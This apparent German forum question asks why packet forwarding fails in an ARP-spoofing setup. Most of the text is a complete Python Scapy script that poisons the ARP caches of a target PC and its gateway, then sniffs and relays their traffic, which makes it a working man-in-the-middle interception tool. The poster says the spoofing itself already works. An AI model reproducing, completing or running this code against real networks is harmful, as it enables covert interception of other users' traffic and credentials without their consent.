1
Ich hatte ARP Spoofing erfolgreich mit Scapy Python-Code gemacht. Die Mac-Adresse im Ziel-PC für das Gateway wurde in die MAC-Adresse meines PCs geändert und die MAC-Adresse des Ziel-PCs im Cache des Routers wurde an meine Mac-Adresse angepasst. Jetzt möchte ich diese Pakete über meinen PC an den entsprechenden Ort weiterleiten. Damit ich den Verkehr zwischen dem Ziel-PC und dem Gateway sehen kann. Aber es funktioniert nicht.ARP Spoofing mit Python Scapy funktioniert nicht
import os
import sys
import threading
import signal
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
our_mac='d8:5d:e2:0c:58:87'
print 'Enter Target IP:'
target_ip = raw_input()
print 'Enter Gateway IP'
gateway_ip = raw_input()
packet_count = 50
# turn off output
conf.verb = 0
def get_mac(ip_address):
responses,unanswered =srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address),timeout=2,retry=10)
# return the MAC address from a response
for s,r in responses:
return r[Ether].src
return None
gateway_mac = get_mac(gateway_ip)
if gateway_mac is None:
print "[!!!] Failed to get gateway MAC. Exiting."
sys.exit(0)
else:
print "[*] Gateway %s is at %s" % (gateway_ip,gateway_mac)
target_mac = get_mac(target_ip)
if target_mac is None:
print "[!!!] Failed to get target MAC. Exiting."
sys.exit(0)
else:
print "[*] Target %s is at %s" % (target_ip,target_mac)
def restore_target(gateway_ip,gateway_mac,target_ip,target_mac):
# slightly different method using send
print"[*] Restoring target..."
send(ARP(op=2, psrc=gateway_ip, pdst=target_ip,hwdst="ff:ff:ff:ff:ff:ff",hwsrc=gateway_mac),count=100)
send(ARP(op=2, psrc=target_ip, pdst=gateway_ip,hwdst="ff:ff:ff:ff:ff:ff",hwsrc=target_mac),count=100)
# signals the main thread to exit
print"[*] Target Restored..."
sys.exit(0)
os.kill(os.getpid(), signal.SIGINT)
def poison_target(gateway_ip,gateway_mac,target_ip,target_mac):
poison_target = ARP()
poison_target.op = 2
poison_target.psrc = gateway_ip
poison_target.pdst = target_ip
poison_target.hwdst= target_mac
poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = target_ip
poison_gateway.pdst = gateway_ip
poison_gateway.hwdst= gateway_mac
print "[*] Beginning the ARP poison. [CTRL-C to stop]"
while True:
try:
send(poison_target)
send(poison_gateway)
time.sleep(2)
except KeyboardInterrupt:
restore_target(gateway_ip,gateway_mac,target_ip,target_mac)
sys.exit(0)
print "[*] ARP poison attack finished."
sys.exit(0)
return
def send_packet_to_gateway(pkt):
try:
if(pkt.haslayer(IP) and pkt.haslayer(Ether) and not pkt.haslayer(ARP)):
pkt[Ether].dst=gateway_mac
sendp(pkt)
elif(pkt.haslayer(Ether) and not pkt.haslayer(ARP)):
pkt[Ether].dst=gateway_mac
sendp(pkt)
except:
print "It's interrupt"
sys.exit(0)
def send_packet_to_target(pkt):
try:
if(pkt.haslayer(IP) and pkt.haslayer(Ether) and not pkt.haslayer(ARP)):
pkt[Ether].dst=target_mac
sendp(pkt)
elif(pkt.haslayer(Ether) and not pkt.haslayer(ARP)):
pkt[Ether].dst=target_mac
sendp(pkt)
except:
print "It's interrupt"
sys.exit(0)
def capture_packets():
try:
print "[*] Starting sniffer for %d packets" % packet_count
bpf_filter = "dst host %s and ether dst %s" % (target_ip, our_mac)
sniff(filter=bpf_filter,prn=send_packet_to_target)
except KeyboardInterrupt:
# restore the network
#restore_target(gateway_ip,gateway_mac,target_ip,target_mac)
print "It's interrupt"
sys.exit(0)
return
# start poison thread
poison_thread = threading.Thread(target = poison_target, args =(gateway_ip, gateway_mac,target_ip,target_mac))
poison_thread.start()
try:
print "[*] Starting sniffer for %d packets" % packet_count
capture_thread = threading.Thread(target = capture_packets)
capture_thread.start()
bpf_filter = "src host %s and ether dst %s" % (target_ip,our_mac)
sniff(filter=bpf_filter,prn=send_packet_to_gateway)
except KeyboardInterrupt:
sys.exit(0)
# restore the network
#restore_target(gateway_ip,gateway_mac,target_ip,target_mac)
#sys.exit(0)